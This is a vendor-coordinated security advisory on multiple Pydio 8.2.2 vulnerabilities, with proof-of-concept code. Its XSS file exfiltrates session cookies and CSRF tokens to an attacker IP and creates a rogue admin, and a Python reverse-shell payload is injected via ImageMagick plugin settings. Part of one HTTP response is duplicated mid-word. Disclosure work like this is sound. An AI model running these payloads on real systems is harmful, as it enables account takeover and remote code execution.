Pydio 8 Multiple Vulnerabilities

1. Advisory Information

Title: Pydio 8 Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0002
Advisory URL: https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities  
Date published: 2019-03-28
Date of last update: 2019-03-28
Vendors contacted: Pydio
Release mode: Coordinated release

2. Vulnerability Information

Class: Argument Injection or Modification [CWE-88], Argument Injection or Modification [CWE-88], Information Exposure [CWE-200], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200], Information Exposure [CWE-200]
Impact: Code execution, Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047, CVE-2019-10046, CVE-2019-10046

3. Vulnerability Description

Pydio [1] website states that:

...Pydio, an open source EFSS (Enterprise File Synchronization and Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud environment. Pydio is available either through a Community distribution (Ideal for home use) that is free forever or an Enterprise which provides all the features, support and compliance to secure file sharing. Pydio is sold in more than 25 countries, from Cupertino to Singapore, and is used by leading brands around the world, such as Nikon, Credit Agricole, Dexia... Pydio also serves education and government clients, with major references such as Cambridge University (UK) and ADEME (France).

Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2), which allows an attacker with regular user access to the application and by tricking an administrator account to open a shared URL bookmark through the application, to obtain the victim's session identifiers in order to impersonate him/her and to perform actions such as create a new user administrator account. After gaining privileged access to the application the attacker can leverage another vulnerability to perform OS command injection under the privileges of the user account running the web server.

4. Vulnerable Packages

  • Pydio 8.2.2 - Latest version at the time of testing.
  • Older versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Pydio published v8.2.3 that fixes all the reported vulnerabilities.

6. Credits

These vulnerabilities were discovered and researched by Ramiro Molina from SecureAuth Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

7. Technical Description / Proof of Concept Code

7.1. Privilege escalation vector based in multiple vulnerabilities

[CVE-2019-10049] By chaining vulnerabilities it is possible for an attacker with regular user access to the web application to attempt to trick an administrator user to open a link shared through the application, that in turn opens a shared file that contains JavaScript code that is executed in the context of the victim user to obtain sensitive information such as session identifiers (session cookie and secure token) and perform actions on behalf of him/her. Note: if the targeted users are not administrators, any other action on behalf of that user could also be achieved, to for example obtain sensitive files stored in their accounts or impersonate them.

Attack vector steps:

1. Authenticated in the web application with a regular user account, go to "My Files" and upload a file named for example pydio_xss.html (use the .html extension) with the following content. The PoC once executed performs several requests to:

  • Obtain a "secure_token" for the user, which is a CSRF prevention token.
  • Obtain the session cookie for the current user.
  • Send the two sensitive tokens to the attacker, this allows to impersonate the victim user.
  • Change the "context to configuration".
  • Create a new user account named "admin99" with password "password1".
  • Change the user role of the created user to administrator.

Note: change the IP address and port number (the example ones are the IP 192.168.56.1 and port 9999).

PoC pydio_xss.html file:

<html>
<body>
<script type="text/javascript">
console.log("Starting...");
var req0 = new XMLHttpRequest();
req0.open('GET', "/welcome/", true);
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
req0.send();
req0.onload  = function() {
var res =  req0.responseText.match(/SECURE_TOKEN.*?,/)[0];
var secure_token = res.split(/"/)[2] ;
var req1 = new XMLHttpRequest();
  req1.open('POST', "index.php", true);
  req1.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  req1.send("get_action=get_sess_id&secure_token=" + secure_token);
  req1.onload  = function() {
	  var session_cookie = req1.responseText;
	  var req2 = new XMLHttpRequest();
	  req2.open('POST', "http://192.168.56.1:9999/creds", true);
	  req2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
	  req2.send("Session Cookie: " + session_cookie + "; secure_token: " + secure_token);
	  req2.onload  = function() {
		  console.log("I just sent your protected session cookie.");
	  };
	  //switch "repository" to  configuration
	  var req3 = new XMLHttpRequest();
	  req3.open('POST', "/index.php", true);
	  req3.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
	  req3.send("get_action=switch_repository&repository_id=ajxp_conf&secure_token=" + secure_token);
	  req3.onload  = function() {
		  console.log("Creating a new admin user...");
		  var req4 = new XMLHttpRequest();
		  req4.open('POST', "/index.php", true);
		  req4.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
		  req4.send("get_action=create_user&new_user_login=admin99&new_user_pwd=password1&group_path=&secure_token=" + secure_token);
		  req4.onload  = function() {
			  console.log(req4.responseText);
		  console.log("Promoting user to admin...");
		  var req5 = new XMLHttpRequest();
		  req5.open('POST', "/index.php", true);
		  req5.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
		  req5.send("get_action=edit&sub_action=post_json_role&role_id=AJXP_USR_%2Fadmin99&json_data=%7B%22ROLE%22%3A%7B%22ACL%22%3A%7B%7D%2C%22MASKS%22%3A%7B%7D%2C%22ACTIONS%22%3A%7B%7D%2C%22PARAMETERS%22%3A%7B%7D%2C%22APPLIES%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D%2C%22METADATA%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D&secure_token=" + secure_token);
		  req5.onload  = function() {
			  console.log(req5.responseText);
			  };
		  };
	  };
  };
};
</script>
</body>
</html>

2. Still in "My Files" create a new URL bookmark with the following URL and a label of your choice. Note that selecting a good label can help into tricking an administrator user into opening the bookmark. The URL must reference the filename uploaded in the previous step. For this example, the file is named "pydio_xss.html":

http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fpydio_xss.html

3. Select each the uploaded HTML file and share it with the administrator user account by clicking on share and in the popup, window select the target user (or users if the administrator account is not known) and click on save.

4. Do the same with the URL Bookmark and share it with the victim administrator user/s.

5. On a command prompt with for example ncat set a listener for the incoming post request with the session identifiers.

6. Once the administrator opens the URL Bookmark the JavaScript code in the uploaded file will be executed, the session identifiers will be posted to the attacker's machine and a new administrator user (named "admin99" with password "password1") will be created.

7. The attacker can login with the created administrator user or can leverage the session identifiers to impersonate the victim user.

Note: after gaining access as an administrator to the web application an attacker can leverage the OS command injection vulnerability described in this advisory to run system commands on the underling operative system with the local user running the web server.

7.2. OS command injection by parameter abuse in ImageMagick plugin

[CVE-2019-10048] The ImageMagick plugin that is installed by default in Pydio 8.2.2 does not perform the appropriate validation and sanitization of user supplied input in the plugin's configuration options allowing arbitrary shell commands to be entered that result in command execution on the underlying operative system with the privileges of the local user running the web server. The attacker will need to be authenticated into the application with an administrator user account in order to be able to edit the affected plugin configuration. In this advisory a privilege escalation vector by levering other vulnerabilities from a regular user standpoint is also described.

Proof of Concept:

1. Logged in with an administrator account into the web application, go to Settings -> Editors.

2. Disable the PDF Viewer plugin.

3. Enable the ImageMagick plugin.

4. Click on Edit ImageMagick plugin settings.

5. In the popup window, add at the end of the current settings for the "Thumbs options" and "Images options" parameters the following example payload to run a python reverse shell (where in the example the IP address is 192.168.56.1 and the port number is 9999, edit accordingly) and save the settings. An example payload is:

; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';

6. On a command prompt with for example ncat set a listener for the incoming reverse shell.

7. With the administrator account, or any other account upload a test PDF file to a workspace and observe that a reverse shell is received.

Affected source code:

The affected source code section is located in the file: "plugins/editor.imagick/IMagickPreviewer.php" line #380. The following code section is where the vulnerability is located. Note that the user provided parameters are not validated and sanitized before construction the "$cmd" string an being passed to the exec() function.

$customOptions = $this->getContextualOption($ctx, "IM_CUSTOM_OPTIONS");
$customEnvPath = $this->getContextualOption($ctx, "ADDITIONAL_ENV_PATH");
$viewerQuality = $this->getContextualOption($ctx, "IM_VIEWER_QUALITY");
$thumbQuality = $this->getContextualOption($ctx, "IM_THUMB_QUALITY");
if (empty($customOptions)) {
	$customOptions = "";
}
if (!empty($customEnvPath)) {
	putenv("PATH=".getenv("PATH").":".$customEnvPath);
}
$params = $customOptions." ".( $this->extractAll? $viewerQuality : $thumbQuality );
$cmd = $this->getContextualOption($ctx, "IMAGE_MAGICK_CONVERT")." ".$params." ".escapeshellarg(($masterFile).$pageLimit)." ".escapeshellarg($tmpFileThumb);
$this->logDebug("IMagick Command : $cmd");
session_write_close(); // Be sure to give the hand back
exec($cmd, $out, $return);
        

7.3. Current user AjaXplorer session cookie value disclosure

[CVE-2019-10045] The AjaXplorer session cookie is correctly set with the HTTPOnly flag to prevent access to its value from scripts. The affected "action" get_sess_id discloses the session cookie value in the response body enabling scripts to get access to its value. This identifier can be reused by an attacker to impersonate a user and perform actions on behalf of him/her if the session is still active.

Proof of Concept:

The response to the following HTTP POST request with the parameter get_action=get_sess_id returns the current user session identifier (AjaXplorer session cookie value) in the response. Request:

POST /index.php? HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/ws-inbox/
content-type: application/x-www-form-urlencoded; charset=UTF-8
origin: http://192.168.56.101
Content-Length: 68
Connection: close
Cookie: AjaXplorer=1ln7fa60h1ajsapm7ha45sge26; ajxp_licheck=ok

get_action=get_sess_id&secure_token=zZ6lpJaRUovEYm0imb839L8YhWI1UHZK       

Response:

HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:21:18 GMT
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/plain;charset=UTF-8
Content-Length: 26

1ln7fa60h1ajsapm7ha45sge26

7.4. Stored Cross-site scripting (XSS) in file view feature

[CVE-2019-10047] A stored cross-site scripting vulnerability exists in the affected web application that can be exploited by levering the file upload and file preview features of the application. An authenticated attacker can upload an HTML file containing Javascript code and afterword's a file preview URL can be used to access the uploaded file. If a malicious user shares an uploaded HTML file containing JavaScript code with another user of the application and tricks an authenticated victim into accessing an URL (i.e. by clicking in a link) that results in the HTML code being interpreted by the web browser and the included JavaScript code being executed under the context of the victim user session.

Proof of Concept:

With an authenticated user go to "My Files" and upload a HTML file as the following PoC, which is named for example "xss.html":

<html>
<body>
<script type="text/javascript">
alert("SecureAuth");
</script>
</body>
</html>

In another tab of the web browser access the following URL, and notice that the JavaScript code is executed, and a popup alert is displayed:

http://192.168.56.102/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html

Request:

GET /index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: AjaXplorer=gdn92c6maohf28lt2noiso1891; ajxp_licheck=ok
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:00:21 GMT
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Disposition: inline; filename="xss.html"
Content-Length: 66
Connection: close
Content-Type: text/html; charset=us-ascii; name="xss.html"

<html>
<body>
<script>alert("SecureAuth")</script>
</body>
</html>

Share the file with an administrator user, and logged in with that user account access the "Shared Files" repository and in another tab, access following URL and notice that the JavaScript code is also executed:

http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html

Request:

GET /index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: AjaXplorer=6vh2o75udh253f6lu8p99cpmr5; ajxp_licheck=ok
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:01:05 GMT
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Disposition: inline; filename="xss.html"
Content-Length: 66
Connection: close
Content-Type: text/html; charset=us-ascii; name="xss.html"

<html>
<body>
<script>alert("SecureAuth")</script>
</body>
</html>

7.5. Unauthenticated Pydio and PHP libraries versions information disclosure

[CVE-2019-10046] An unauthenticated attacker can obtain information about the Pydio version and PHP libraries and their versions by performing a HTTP POST request to /index.php and including the parameters "get_action=display_doc& doc_file=CREDITS" in the body.

Proof of Concept:

Request:

POST /index.php? HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.102/welcome/
content-type: application/x-www-form-urlencoded; charset=UTF-8
origin: http://192.168.56.102
Content-Length: 53
Connection: close
Cookie: AjaXplorer=a; ajxp_licheck=ok

get_action=display_doc&doc_file=CREDITS&secure_token=

Response:

HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:26:49 GMT
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/plain;charset=UTF-8
Content-Length: 9246

<img src="plugins/gui.ajax/PydioLogo250.png"/>
<br><div style="padding-left:10px;"><div style="font-size:0.8em;">Version 8.2.2 - 2018-10-10
<br>Copyright 2007-2017 Abstrium SAS
<br>The latest code can be found at https://pydio.com/.
<br></div>
...
TRUNCATED
...
<br>
<br><div class="title">PHP Libraries</div>
<br>
<br>    aws/aws-sdk-php                    3.19.18             Apache-2.0
<br>    commerceguys/guzzle-oauth2-plugin  v2.1.1              MIT
<br>    dapphp/securimage                  3.6.4               BSD
<br>    davegardnerisme/nsqphp             dev-master 60f12ad  none
<br>    evenement/evenement                v2.0.0              MIT
<br>    firebase/php-jwt                   v2.2.0              BSD-3-Clause
<br>    gimler/guzzle-description-loader   v0.0.4              MIT
<br>    guzzlehttp/command                 0.7.1               MIT
<br>    guzzlehttp/guzzle                  5.3.1               MIT
<br>    guzzlehttp/guzzle-services         0.5.0               MIT
<br>    guzzlehttp/promises                1.2.0               MIT
<br>    guzzlehttp/psr7                    1.3.1               MIT
<br>    guzzlehttp/ringphp                 1.1.0               MIT
<br>    guzzlehttp/streams                 3.0.0               MIT
<br>    meenie/javascript-packer           1.1                 LGPL 2.1
<br>    mtdowling/jmespath.php             2.3.0               MIT
<br>    nikic/fast-route                   v1.0.1              BSD-3-Clause
<br>    phpseclib/phpseclib                2.0.3               MIT
<br>    psr/http-message                   1.0.1               MIT
<br>    psr/log                            1.0.2               MIT
<br>    react/cache                        v0.4.1              MIT
<br>    react/child-process                v0.4.1              MIT
<br>    react/dns                          v0.4.3              MIT
<br>    react/event-loop                   v0.4.2              MIT
<br>    react/http                         v0.4.1              MIT
<br>    react/http-client                  v0.4.13             MIT
<br>    react/promise                      v2.4.1              MIT
<br>    react/react                        v0.4.2              MIT
<br>    react/socket                       v0.4.3              MIT
<br>    react/socket-client                v0.4.5              MIT
<br>    react/stream                       v0.4.4              MIT
<br>    sabre/dav                          1.8.10              BSD-3-Clause
<br>    sabre/vobject                      2.1.7               BSD-3-Clause
<br>    symfony/config                     v3.1.5              MIT
<br>    symfony/console                    v3.1.5              MIT
<br>    symfony/debug                      v3.1.5              MIT
<br>    symfony/filesystem                 v3.1.5              MIT
<br>    symfony/polyfill-mbstring          v1.2.0              MIT
<br>    symfony/yaml                       v3.1.5              MIT
<br>    zendframework/zend-diactoros       1.3.7               BSD-2-Clause
<br>
<br>
<br><div class="title">Other Plugins</div>
<br>	PThumb.php <a target="_blank" href="http://www.phpclasses.org">http://www.phpclasses.org</a> (LPGL)
<br>	OpenLayers <a target="_blank" href="http://www.openlayers.org">http://www.openlayers.org</a> (BSD)
<br>	Video-js <a target="_blank" href="http://www.videojs.com/">http://www.videojs.com/</a> (LGPL)
<br>	Zend Lucene <a target="_blank" href="http://www.zend.com/">http://www.zend.com/</a> (New BSD)
<br>	SoundManager : <a target="_blank" href="http://www.schillmania.com/projects/soundmanager2/">http://www.schillmania.com/projects/soundmanager2/</a> (BSD)
<br>	CAS Driver (Apache 2): https://github.com/Jasig/phpCAS
<br>
<br></div>

7.6. Unauthenticated Pydio "Boot Config" information disclosure

[CVE-2019-10046] An unauthenticated attacker can obtain information about the Pydio configuration including session timeout and license information by performing a HTTP GET request to "/index.php?get_action=get_boot_conf".

Proof of Concept:

Request:

GET /index.php?get_action=get_boot_conf HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:42:53 GMT
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
Connection: close
Content-Type: application/json
Content-Length: 136855
{
  "ajxpResourcesFolder": "plugins/gui.ajax/res",
  "ajxpServerAccess": "index.php",
  "zipEnabled": true,
  "multipleFilesDownloadEnabled": true,
  "customWording": {
	"welcomeMessage": "My Company File Sharing Platform",
	"title": "Pydio Enterprise",
	"icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",
	"iconWidth": "250px",
	"iconHeight": "120px",
	"iconOnly": true,
	"titleFontSize": ""
  },
  "usersEnabled": true,
  "loggedUser": false,
  "currentLanguage": "en",
  "session_timeou      Date: Wed, 30 Jan 2019 22:42:53 GMT
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
Connection: close
Content-Type: application/json
Content-Length: 136855
{
  "ajxpResourcesFolder": "plugins/gui.ajax/res",
  "ajxpServerAccess": "index.php",
  "zipEnabled": true,
  "multipleFilesDownloadEnabled": true,
  "customWording": {
	"welcomeMessage": "My Company File Sharing Platform",
	"title": "Pydio Enterprise",
	"icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",
	"iconWidth": "250px",
	"iconHeight": "120px",
	"iconOnly": true,
	"titleFontSize": ""
  },
  "usersEnabled": true,
  "loggedUser": false,
  "currentLanguage": "en",
  "session_timeout": 1440,
  "client_timeout": 1440,
  "client_timeout_warning": 3,
	
  ...
  TRUNCATED
  ...

  "helper_booster.updater.force.2": "force reinstall",
  "helper_booster.updater.force.3": "?"
  },
  "SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",
  "streaming_supported": "true",
  "theme": "material",
  "ajxpImagesCommon": true,
  "licence_features": [
	"TRIAL",
	"footer",
	"splash",
	"customCopyright:<a href='https://pydio.com'>Pydio Enterprise Distribution</a> - Trial version valid until 2019-02-20."
  ]
}t": 1440,
  "client_timeout": 1440,
  "client_timeout_warning": 3,

...
TRUNCATED
...

	"helper_booster.updater.force.2": "force reinstall",
	"helper_booster.updater.force.3": "?"
  },
  "SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",
  "streaming_supported": "true",
  "theme": "material",
  "ajxpImagesCommon": true,
  "licence_features": [
	"TRIAL",
	"footer",
	"splash",
	"customCopyright:<a href='https://pydio.com'>Pydio Enterprise Distribution</a> - Trial version valid until 2019-02-20."
  ]
}         

8. Report Timeline

  • 2019-02-11: SecureAuth sent an initial notification to Pydio including a draft advisory.
  • 2019-02-11: Pydio confirmed the reception of the advisory.
  • 2019-02-15: Pydio informed they were testing the vulnerabilities and they will answer back next week.
  • 2019-02-15: SecureAuth thanked the update.
  • 2019-02-20: Pydio requested a clarification about some vulnerabilities.
  • 2019-02-21: SecureAuth sent additional information to Pydio.
  • 2019-03-08: SecureAuth requested an update.
  • 2019-03-08: Pydio replied saying they were planning to release their fix next week and asked SecureAuth to test this new version.
  • 2019-03-08: SecureAuth thanked the update and agreed to test the new version.
  • 2019-03-12: Pydio sent the fixed version.
  • 2019-03-15: Pydio asked for an update and proposed to release its fix on Tuesday 19th.
  • 2019-03-15: SecureAuth informed Pydio that the fixed version was tested and all the reported vulnerabilities were addressed. In addition, SecureAuth proposed to postpone the release date to Thursday 21th.
  • 2019-03-18: Pydio thanked the answer and agreed on the proposal.
  • 2019-03-21: Pydio released the version 8.2.3
  • 2019-03-28: Advisory SAUTH-2019-0002 published.

9. References

[1] https://pydio.com/en/about-us

10. About SecureAuth Labs

SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com.

11. About SecureAuth

SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible platform makes it easier for organizations to prevent the misuse of credentials. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at mailto:secureauth.com

12. Disclaimer

The contents of this advisory are copyright (c) 2019 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/